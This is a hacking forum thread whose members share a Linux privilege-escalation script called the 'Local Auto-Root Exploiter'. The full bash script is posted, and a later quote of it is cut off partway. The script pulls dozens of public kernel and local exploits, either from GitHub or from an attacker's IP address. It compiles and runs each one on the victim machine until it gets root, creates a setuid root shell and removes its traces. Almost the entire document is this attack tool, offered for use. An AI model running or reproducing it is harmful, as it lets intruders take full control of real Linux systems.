Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

 

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      D4rkn3S

      linux privilege escalation commands

      By D4rkn3S, in Pentesting

      Recommended Posts

      D4rkn3S    854

      D4rkn3S
      Posted

      hello guys, there is commands and cheat sheet which need at privilege escalation phase

       

      Hidden Content

        Give reaction to this post to see the hidden content.

      Share this post

      Link to post
      Share on other sites

      zhanghuhu    0

      zhanghuhu
      Posted

      i am really looking for these command hope u are going to proivide private commands 

      Share this post

      Link to post
      Share on other sites

      bash818    227

      bash818
      Posted

      Windows

      Hidden Content

        Give reaction to this post to see the hidden content.

      Linux

      Hidden Content

        Give reaction to this post to see the hidden content.

      Share this post

      Link to post
      Share on other sites

      D4rkn3S    854

      D4rkn3S
      Posted
      23 hours ago, bash818 said:

      Windows

      Hidden Content

        Give reaction to this post to see the hidden content.

      Linux

      Hidden Content

        Give reaction to this post to see the hidden content.

      nice scripts LARA.sh bash818, but when i checked, there  links not worked in this script, i modified it and here is working bash script

       

      Spoiler

      #!/bin/bash

      bold=`tput bold`
      normal=`tput sgr0`
      red='\e[0;31m'
      yellow='\e[1;33m'
      blue='\e[1;34m'
      light_green='\e[1;32m'
      light_cyan='\e[1;36m'
      cyan='\e[0;36m'
      red='\e[0;31m'
      light_red='\e[1;31m'
      brown='\e[0;33m'
      no_color='\e[0m'

      #com_url='$gaddress/linux/local'
      #x86_64_url='$gaddress/lin_x86-64/local'
      #x86_url='$gaddress/lin_x86/local'
      #sploits_url='$saddress/sploits'

      function lauto_root(){

          echo -e "\n${light_green}${bold}###################################################"
          echo -e "${light_green}${bold}#            ${light_red}Local Auto-Root Exploiter            ${light_green}#"
          echo -e "${light_green}${bold}#               By ${light_red}Enigma Dimitri                 ${light_green}#"
          echo -e "${light_green}${bold}#           ${yellow}Inspired by Auto Root Exploit         ${light_green}#"
          echo -e "${light_green}${bold}#               By Nilotpal Biswas                #"
          echo -e "${light_green}${bold}###################################################"
      }    

      function desc(){

          echo -e "\n${light_red}${bold}Usage: ${yellow}$0 [${light_green}option${yellow}]\n"
          echo -e "${light_red}${bold}Options: ${no_color}\n"
          echo -e "${bold}${yellow} -a  or --arsenal: ${light_green} Downloads the exploits to /var/www/html directory and start the apache server."
          echo -e "${bold}${yellow} -l <Attacker-IP>  or --Lroot <Attacker-IP>: ${light_green} Get the exploits from attackers machine and starts the exploiter."
          echo -e "${bold}${yellow} -r  or --Rroot: ${light_green} Downloads the exploits directly to the server and starts the exploiter.\n"
          echo -e "${bold}${light_red}Command Examples: \n"
          echo -e "${light_red}Create Local Arsenal: ${yellow}$0 -a"
          echo -e "${light_red}LAN Root: ${yellow}$0 -l 10.10.10.123"
          echo -e "${light_red}Remote Root: ${yellow}$0 -r \n"
      }

      function local_dir(){

          sudo rm -r /var/www/html/exploits
          # Creating the required Directories
          sudo mkdir /var/www/html/exploits
          sudo mkdir /var/www/html/exploits/gitex
          sudo mkdir /var/www/html/exploits/linux
          sudo mkdir /var/www/html/exploits/linux/local
          sudo mkdir /var/www/html/exploits/linux_x86-64
          sudo mkdir /var/www/html/exploits/linux_x86-64/local
          sudo mkdir /var/www/html/exploits/linux_x86
          sudo mkdir /var/www/html/exploits/linux_x86/local
          sudo mkdir /var/www/html/exploits/sploits
      }

      function arsenal(){

          # Getting the common exploits to local directory
          cd /var/www/html/exploits/linux/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux/local/2031.c 
          sudo wget --no-check-certificate $gaddress/linux/local/17391.c 
          sudo wget --no-check-certificate $gaddress/linux/local/18411.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33321.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35161.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5092.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8572.c  
          sudo wget --no-check-certificate $gaddress/linux/local/25202.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33322.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40812.c 
          sudo wget --no-check-certificate $gaddress/linux/local/37292.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2013.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5093.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8673.c 
          sudo wget --no-check-certificate $gaddress/linux/local/10613.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40003.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2004.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15704.c 
          sudo wget --no-check-certificate $gaddress/linux/local/25444.c 
          sudo wget --no-check-certificate $gaddress/linux/local/30604.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33824.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41994.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2005.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15285.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41995.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2006.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40616.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33336.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39166.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41886.c 
          sudo wget --no-check-certificate $gaddress/linux/local/1397.c 
          sudo wget --no-check-certificate $gaddress/linux/local/27297.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39277.c 
          sudo wget --no-check-certificate $gaddress/linux/local/718.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8678.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41458.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40839.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35370.c 
          sudo wget --no-check-certificate $gaddress/linux/local/38390.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39230.c
          sudo wget --no-check-certificate $gaddress/linux/local/42183.c

          #bash exploits
          sudo wget --no-check-certificate $gaddress/linux/local/2011.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/8478.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/10018.sh 

          #python exploits
          sudo wget --no-check-certificate $gaddress/linux/local/9844.py 
          sudo wget --no-check-certificate $gaddress/linux/local/12130.py 

          # Getting 64bit only exploits to lin_x86-64 directory
          cd /var/www/html/exploits/lin_x86-64/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c

          # Getting 32-bit only exploit to lin_x86 directory
          cd /var/www/html/exploits/lin_x86/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86/local/9542.c

          # Getting the compressed exploits to sploits directory
          cd /var/www/html/exploits/sploits

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/39772.zip
          sudo wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/33395.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/40489.zip

          # Getting CVE-2016-2384 exploit to gitex directory 
          cd /var/www/html/exploits/gitex

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gitaddress/poc.c
          sudo wget --no-check-certificate $gitaddress/poc.py
      }

      function valid_ip()
      {
          if ! [ "$2" ]; then
              echo -e "${red}${bold}IP Not Provided, Please provide an IP"
          else
              if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

                  for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
                  do
                    (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
                  done
              else
                  echo -e "${light_green}========================================"
                  echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
                  echo -e "========================================"
                  exit 1;
              fi
          fi
      }

      #gaddress=$1'/exploits'
      #saddress=$1'/exploits'
      #gitaddress=$1'/exploits/gitex'
      function exploiter(){

          checkroot() {
              if [ $(id -u) == 0 ]; then
              echo
              echo -e "${light_red}Successfully R00T(ed).. have fun :)"
              id=$(id)
              echo -e "${light_red}ID     => ${light_green}" $id
              who=$(whoami)
              echo -e "${light_red}WHOAMI => ${light_green}" $who
              exit
              else
              echo ""
              echo -e "${light_red}R00Ting.. ${light_green}"
              sleep 1
              fi
          }
          ccmpl(){
              gcc exploit.c -o exploit -lutil -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -m32 -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lkeyutils -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -pthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -static -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -fPIC -shared -o exploit exploit.c -ldl -w
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -O2 exploit.c
              gcc -O2 -fomit-frame-pointer exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c -static -O2
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -pthread exploit.c -o exploit -lcrypt
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -m64 -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
          }
          shcmpl(){
              bash exploit.sh
              rm exploit.sh
              rm *.c
              checkroot;
          }
          pycmpl(){
              python exploit.py
              rm exploit.py
              rm *.c
              checkroot;
          }
          echo -e "${light_red}Auto R00Ting started...${light_green}"

          checkroot;
          #c
          wget --no-check-certificate $gaddress/linux/local/2031.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/17391.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/18411.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33321.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35161.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5092.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8572.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86/local/9542.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25202.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33322.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40812.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/37292.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2013.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5093.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8673.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/10613.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40003.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2004.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15704.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25444.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/30604.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33824.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41994.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2005.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15285.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41995.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2006.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40616.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33336.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39166.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41886.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/1397.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/27297.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39277.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/718.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8678.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41458.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40839.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35370.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/38390.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39230.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/42183.c -O exploit.c
          ccmpl;

          #sh
          wget --no-check-certificate $gaddress/linux/local/2011.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/8478.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/10018.sh -O exploit.sh
          shcmpl;

          #py
          wget --no-check-certificate $gaddress/linux/local/9844.py -O exploit.py
          pycmpl;
          wget --no-check-certificate $gaddress/linux/local/12130.py -O exploit.py
          pycmpl;

          #txt
          #platforms/linux/local/9191.txt
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/39772.txt
          wget --no-check-certificate $saddress/bin-sploits/39772.zip
          cd 39772
          unzip 39772.zip
          tar -xf exploit.tar
          cd ebpf_mapfd_doubleput_exploit
          bash compile.sh
          ./hello
          ./doubleput
          ./suidhelper
          cd ..
          rm -rf ebpf_mapfd_doubleput_exploit
          rm -rf exploit.tar
          checkroot;
          tar -xf crasher.tar
          cd ebpf_mapfd_doubleput_crasher
          bash compile.sh
          ./doubleput
          cd ..
          rm -rf ebpf_mapfd_doubleput_crasher
          rm -rf 39772
          rm -rf 39772.zip
          checkroot;
          #platforms/linux/local/23674.txt
          smbmount --version
          ls -l /usr/bin/smbmount
          ls -l /usr/bin/smbmnt
          echo "main(){setuid(0);setgid(0);system("/bin/bash");}" > a.c
          make a
          cc a.c -o a
          chmod +s a
          share:/etc/samba/smb.conf
          /etc/samba/smb.conf
          [share]
          path = /data/share
          writable = no
          locking = no
          public = yes
          guest ok = yes
          comment = Share
          ls -l a
          ls -l pokus/a
          id
          checkroot;
          #platforms/linux/local/29714.txt
          wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          tar -zxf 29714.tgz
          cd exploit
          make
          make install
          cd ..
          rm -rf exploit
          rm -rf 29714.tgz
          checkroot;
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/33395.txt
          wget $saddress/bin-sploits/33395.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          checkroot;
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          #platforms/linux/local/40489.txt
          wget --no-check-certificate $saddress/bin-sploits/40489.zip
          unzip 40489.zip
          cd 40489
          bash compile.sh
          ./pwn
          ./enjoy
          cd ..
          rm -rf 40489
          rm -rf 40489.zip
          checkroot;
          #platforms/linux/local/41770.txt
          # #!/bin/bash
          # (./ProcReadHelper /proc/$$/syscall) &
          # sleep 1
          # exec /usr/bin/passwd
          # #!/bin/bash
          # echo "Current pid is $$"
          # (sleep 10; echo 127 ) > /proc/$$/coredump_filter &
          # sleep 5
          # exec /usr/bin/passwd
          # static ssize_t mem_read(struct file * file, char __user * buf,
          #                         size_t count, loff_t *ppos) {
          #     if (file->private_data != (void*)((long)current->self_exec_id))
          #         goto out_put;
          # #!/bin/bash
          # (sleep 3; echo 15) > /proc/$$/oom_adj &
          # exec /usr/bin/passwd
          # checkroot;
          #platforms/linux/local/38559.txt
          rmmod b43
          modprobe b43 fwpostfix=AA%xBB
          dmesg
          checkroot;
          #platforms/linux/local/41999.txt
          wget --no-check-certificate $gitaddress/poc.c -O poc.c
          gcc poc.c -masm=intel
          ./a.out 0
          checkroot;
          ./a.out 1
          checkroot;
          ./a.out 2
          checkroot;
          ./a.out 3
          checkroot;
          ./a.out 4
          checkroot;
          ./a.out 5
          checkroot;
          ./a.out 6
          checkroot;
          ./a.out 7
          checkroot;
          ./a.out 8
          checkroot;
          ./a.out 9
          checkroot;
          ./a.out 10
          checkroot;
          rm a.out
          rm poc.c
          wget --no-check-certificate $gitaddress/poc.py -O poc.py
          python poc.py
          checkroot;
          rm poc.py
          rm a.out
          rm exploit
          
          echo -e "${light_red}Srry.. I tried hard, but no luck this time.. Wait for update :("
          exit 1;
      }


      if ! [ "$1" ] || [ "$1" == '-h' ]  || [ "$1" == '--help' ] ; then #|| ! [ "$2" ]; then
          lauto_root
          desc
      fi

      if [ "$1" == '-a' ] || [ "$1" == '--arsenal' ] ; then
          lauto_root
          sleep 2 
          echo -e "\n${light_green}=================================="
          echo -e "#   ${light_red}Initiating Arsenal script   ${light_green} #"
          echo -e "==================================\n"
          # original line gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms'
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          # original line saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-6074'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308'
          local_dir
          arsenal
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Local Arsenal Set..  ${light_green}#"
          echo -e "==========================\n"
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Starting Apache2     ${light_green}#"
          echo -e "==========================\n"
          /bin/bash -i /etc/init.d/apache2 start
          /bin/bash -i /etc/init.d/apache2 status
          echo -e "${light_green}=================================="
          echo -e "#    ${light_red}Run Exploiter on Victim     ${light_green}#"
          echo -e "==================================\n"

          exit 1;
      fi 

      if [ "$1" == '-l' ] || [ "$1" == '--Lroot' ] ; then
          lauto_root
          if ! [ "$2" ]; then
              echo -e "\n${light_red}No IP address provided!!!\n"
              exit 1;
          else     
              ip=$2
          fi

          if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

              for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
              do
                (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
              done
          else
              echo -e "${light_green}========================================"
              echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
              echo -e "========================================\n"
          fi    

          sleep 2 
          echo -e "${light_green}=================================="
          echo -e "#   ${light_red}Initiating Local Exploiter   ${light_green}#"
          echo -e "==================================\n"
          gaddress='http://'${ip}'/exploits'
          saddress='http://'${ip}'/exploits'
          gitaddress='http://'${ip}'/exploits/gitex'
          exploiter
          exit 1;
      fi

      if [ "$1" == '-r' ] || [ "$1" == '--Rroot' ] ; then
          lauto_root
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          sleep 2 
          echo -e "${light_green}==================================="
          echo -e "#   ${light_red}Initiating Remote Exploiter   ${light_green}#"
          echo -e "===================================\n"
          exploiter
          exit 1;
      fi


       

      thanks for share

      Share this post

      Link to post
      Share on other sites

      bash818    227

      bash818
      Posted (edited)
      hace 8 horas, D4rkn3S dijo:

      nice scripts LARA.sh bash818, but when i checked, there  links not worked in this script, i modified it and here is working bash script

       

        Reveal hidden contents

      #!/bin/bash

      bold=`tput bold`
      normal=`tput sgr0`
      red='\e[0;31m'
      yellow='\e[1;33m'
      blue='\e[1;34m'
      light_green='\e[1;32m'
      light_cyan='\e[1;36m'
      cyan='\e[0;36m'
      red='\e[0;31m'
      light_red='\e[1;31m'
      brown='\e[0;33m'
      no_color='\e[0m'

      #com_url='$gaddress/linux/local'
      #x86_64_url='$gaddress/lin_x86-64/local'
      #x86_url='$gaddress/lin_x86/local'
      #sploits_url='$saddress/sploits'

      function lauto_root(){

          echo -e "\n${light_green}${bold}###################################################"
          echo -e "${light_green}${bold}#            ${light_red}Local Auto-Root Exploiter            ${light_green}#"
          echo -e "${light_green}${bold}#               By ${light_red}Enigma Dimitri                 ${light_green}#"
          echo -e "${light_green}${bold}#           ${yellow}Inspired by Auto Root Exploit         ${light_green}#"
          echo -e "${light_green}${bold}#               By Nilotpal Biswas                #"
          echo -e "${light_green}${bold}###################################################"
      }    

      function desc(){

          echo -e "\n${light_red}${bold}Usage: ${yellow}$0 [${light_green}option${yellow}]\n"
          echo -e "${light_red}${bold}Options: ${no_color}\n"
          echo -e "${bold}${yellow} -a  or --arsenal: ${light_green} Downloads the exploits to /var/www/html directory and start the apache server."
          echo -e "${bold}${yellow} -l <Attacker-IP>  or --Lroot <Attacker-IP>: ${light_green} Get the exploits from attackers machine and starts the exploiter."
          echo -e "${bold}${yellow} -r  or --Rroot: ${light_green} Downloads the exploits directly to the server and starts the exploiter.\n"
          echo -e "${bold}${light_red}Command Examples: \n"
          echo -e "${light_red}Create Local Arsenal: ${yellow}$0 -a"
          echo -e "${light_red}LAN Root: ${yellow}$0 -l 10.10.10.123"
          echo -e "${light_red}Remote Root: ${yellow}$0 -r \n"
      }

      function local_dir(){

          sudo rm -r /var/www/html/exploits
          # Creating the required Directories
          sudo mkdir /var/www/html/exploits
          sudo mkdir /var/www/html/exploits/gitex
          sudo mkdir /var/www/html/exploits/linux
          sudo mkdir /var/www/html/exploits/linux/local
          sudo mkdir /var/www/html/exploits/linux_x86-64
          sudo mkdir /var/www/html/exploits/linux_x86-64/local
          sudo mkdir /var/www/html/exploits/linux_x86
          sudo mkdir /var/www/html/exploits/linux_x86/local
          sudo mkdir /var/www/html/exploits/sploits
      }

      function arsenal(){

          # Getting the common exploits to local directory
          cd /var/www/html/exploits/linux/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux/local/2031.c 
          sudo wget --no-check-certificate $gaddress/linux/local/17391.c 
          sudo wget --no-check-certificate $gaddress/linux/local/18411.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33321.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35161.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5092.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8572.c  
          sudo wget --no-check-certificate $gaddress/linux/local/25202.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33322.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40812.c 
          sudo wget --no-check-certificate $gaddress/linux/local/37292.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2013.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5093.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8673.c 
          sudo wget --no-check-certificate $gaddress/linux/local/10613.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40003.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2004.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15704.c 
          sudo wget --no-check-certificate $gaddress/linux/local/25444.c 
          sudo wget --no-check-certificate $gaddress/linux/local/30604.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33824.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41994.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2005.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15285.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41995.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2006.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40616.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33336.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39166.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41886.c 
          sudo wget --no-check-certificate $gaddress/linux/local/1397.c 
          sudo wget --no-check-certificate $gaddress/linux/local/27297.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39277.c 
          sudo wget --no-check-certificate $gaddress/linux/local/718.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8678.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41458.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40839.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35370.c 
          sudo wget --no-check-certificate $gaddress/linux/local/38390.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39230.c
          sudo wget --no-check-certificate $gaddress/linux/local/42183.c

          #bash exploits
          sudo wget --no-check-certificate $gaddress/linux/local/2011.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/8478.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/10018.sh 

          #python exploits
          sudo wget --no-check-certificate $gaddress/linux/local/9844.py 
          sudo wget --no-check-certificate $gaddress/linux/local/12130.py 

          # Getting 64bit only exploits to lin_x86-64 directory
          cd /var/www/html/exploits/lin_x86-64/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

